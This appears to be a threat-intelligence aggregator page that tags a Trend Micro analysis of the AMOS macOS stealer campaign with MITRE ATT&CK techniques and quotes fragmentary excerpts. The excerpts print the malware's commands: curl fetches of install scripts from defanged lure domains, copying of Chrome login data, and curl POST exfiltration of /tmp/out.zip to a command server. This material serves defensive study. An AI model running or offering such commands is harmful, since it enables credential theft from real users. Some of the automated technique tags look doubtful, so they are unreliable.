TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via ‘Cracked’ Apps

Faith Higgins · 2025-09-04 · Read original ↗

ATT&CK techniques detected

25 predictions
T1555.003Credentials from Web Browsers
100%
“telemetry, and network indicators. during our analysis, the sequence of events began with suspicious process activity, credential theft - related tasks, and possible data exfiltration. these workbenches served as pivot points, prompting the team to launch a deeper investigation i…”
T1553.001Gatekeeper Bypass
98%
“/ / misshon [. ] com / 510f35e247f3359ad7d4temp / e1520e1f09765cb2d800 / load. c6555d31d792b9c74904cefe10e9b13. php? call = seo4 as shown in figure 12, running the infected. dmg file will display a prompt, which provides further instructions to install amos into the machine. appl…”
T1555.003Credentials from Web Browsers
97%
“the / tmp / directory. sh - c cat ' / users / < username > / library / application support / google / chrome / default / login data ' > ' / tmp / 1552 / chromium / chrome _ default / login data ' input capture via password prompt – macos | possible sensitive information exfiltrat…”
T1204.002Malicious File
95%
“specialized malware family designed to steal sensitive data directly from apple users. trend micro already detects this as trojan. macos. amos. pfh. in this campaign, attackers lure macos users with fake, “ cracked ” applications. victims might download a malicious. dmg installer…”
T1059.004Unix Shell
92%
“the software installation would remain unsuccessful and display the following message : method 2 : installation by copying and pasting commands via apple terminal the second method of installing amos was more effective, achieving a higher success rate in distribution. this method…”
T1553.001Gatekeeper Bypass
88%
“allowing execution. in the case of amos, the malware was delivered as a. dmg file that lacked proper notarization. because the targeted machines were running macos sequoia 15. 5 ( arm ) build 24f74, gatekeeper automatically intervened, preventing the malicious installer from runn…”
T1204.004Malicious Copy and Paste
82%
“the command for users to copy and paste into the apple terminal also changes. in our observations, victims were redirected to domains such as ekochist [. ] com, misshon [. ] com, and toutentris [. ] com, all serving as initial landing pages for amos. the threat actor uses frequen…”
T1059.002AppleScript
80%
“such as those used in amos campaigns, are blocked by default. while this doesn ’ t eliminate the risk entirely, especially for users who may bypass built - in protections, it raises the barrier for successful infections and forces attackers to adapt their delivery methods. in thi…”
T1105Ingress Tool Transfer
79%
“. ] com / get4 / install. sh - curl - fssl hxxps : / / letrucvert [. ] com / get8 / install. sh method 1 : installation via. dmg ( clicking “ download for macos ” ) clicking the button will download a. dmg ( e. g. installer _ v. 2. 13. dmg ) installer file with random version in …”
T1553.001Gatekeeper Bypass
77%
“where employees are most likely to be tricked by social engineering tactics. amos and similar threats will continue leaning on social engineering instead of relying on technical attacks. this could include the heavy use of malvertising on legitimate platforms like google ads as w…”
T1555.003Credentials from Web Browsers
72%
“, vpn profiles, keychain items, apple notes, and files from common folders. for business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems. - amos shows that macos is no longer a peripheral target. as macos…”
T1105Ingress Tool Transfer
70%
“< username > / downloads / installer _ v. 2. 13. dmg request : hxxps : / / misshon [. ] com / 510f35e247f3359ad7d4temp / e1520e1f09765cb2d800 / load. c6555d31d792b9c74904cefe10e9b13. php? call = seo4 downloaded file path : / users / < username > / downloads / installer _ v. 2. 13…”
T1059.002AppleScript
65%
“to continue. if the password is incorrect, the dialog box will continue to appear until the correct password is keyed in. once the correct password is entered, a second pop - up dialog box appears, indicating that “ terminal ” wants access to control the “ finder ” app, which is …”
T1074.001Local Data Staging
59%
“all the data is organized into a randomly named directory within / tmp and compressed into a zip archive ( / tmp / out. zip ). curl - x post - h user : 7 / zioa7mzomylytawl6ub2avsrpudm3allmjbslwlnq = - h buildid : rzstkjpmpx2u / 16ldertq1sxfpe - pmw9nn9b15thsri = - h cl : 0 - h c…”
T1059.004Unix Shell
49%
“the command for users to copy and paste into the apple terminal also changes. in our observations, victims were redirected to domains such as ekochist [. ] com, misshon [. ] com, and toutentris [. ] com, all serving as initial landing pages for amos. the threat actor uses frequen…”
T1071Application Layer Protocol
46%
“captured in the “ system preferences ” dialog box. below are the contents of the collected and exfiltrated file, “ / tmp / out. zip / ” : based on the script and data we observed, the following information was collected and exfiltrated to the command - and - control - server of t…”
T1553.001Gatekeeper Bypass
39%
“terminal. doing so bypasses macos ’ s built - in security features, such as gatekeeper. by shifting execution to the user, attackers reduce their effort while still increasing the likelihood of successful infection. mdr delivers round - the - clock monitoring, intelligent threat …”
T1555Credentials from Password Stores
39%
“, vpn profiles, keychain items, apple notes, and files from common folders. for business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems. - amos shows that macos is no longer a peripheral target. as macos…”
T1553.001Gatekeeper Bypass
36%
“an mdr analysis of the amos stealer campaign targeting macos via ‘ cracked ’ apps malware an mdr analysis of the amos stealer campaign targeting macos via ‘ cracked ’ apps trend™ research analyzed a campaign distributing atomic macos stealer ( amos ), a malware family targeting m…”
T1560Archive Collected Data
35%
“all the data is organized into a randomly named directory within / tmp and compressed into a zip archive ( / tmp / out. zip ). curl - x post - h user : 7 / zioa7mzomylytawl6ub2avsrpudm3allmjbslwlnq = - h buildid : rzstkjpmpx2u / 16ldertq1sxfpe - pmw9nn9b15thsri = - h cl : 0 - h c…”
T1059.002AppleScript
34%
“it can run continuously and survive reboots. - system manipulation : the script hides terminal windows and manipulates system files and applications. table 1 : commands executed by amos, as detected by vision one™ installation of persistence trend vision one also detected that a …”
T1204.002Malicious File
33%
“- h cn : 0 - f file = @ / tmp / out [. ] zip hxxps [ : / / ] sivvino [. ] com / contact curl - x post - h user : bhdpwzwv - nuhnpkoviatqf9kdu9g2co / rfmtj5im - xc = - h buildid : oehs3fthtpezooewfruyck23g1oogorsx7vbxyr6dmu = - h cl : 0 - h cn : 0 - f file = @ / tmp / out. zip htt…”
T1048.002Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
33%
“‘. agent ’ script, which then runs in an infinite loop to detect the logged - in user and execute the hidden binary. the binary file establishes persistence by retrieving the username of the currently logged - in user, excluding root. once the script is executed, it copies sensit…”
T1560.001Archive via Utility
33%
“- h cn : 0 - f file = @ / tmp / out [. ] zip hxxps [ : / / ] sivvino [. ] com / contact curl - x post - h user : bhdpwzwv - nuhnpkoviatqf9kdu9g2co / rfmtj5im - xc = - h buildid : oehs3fthtpezooewfruyck23g1oogorsx7vbxyr6dmu = - h cl : 0 - h cn : 0 - f file = @ / tmp / out. zip htt…”
T1055.001Dynamic-link Library Injection
31%
“allowing execution. in the case of amos, the malware was delivered as a. dmg file that lacked proper notarization. because the targeted machines were running macos sequoia 15. 5 ( arm ) build 24f74, gatekeeper automatically intervened, preventing the malicious installer from runn…”

Summary

Trend™ Research analyzed a campaign distributing Atomic macOS Stealer (AMOS), a malware family targeting macOS users. Attackers disguise the malware as “cracked” versions of legitimate apps, luring users into installation.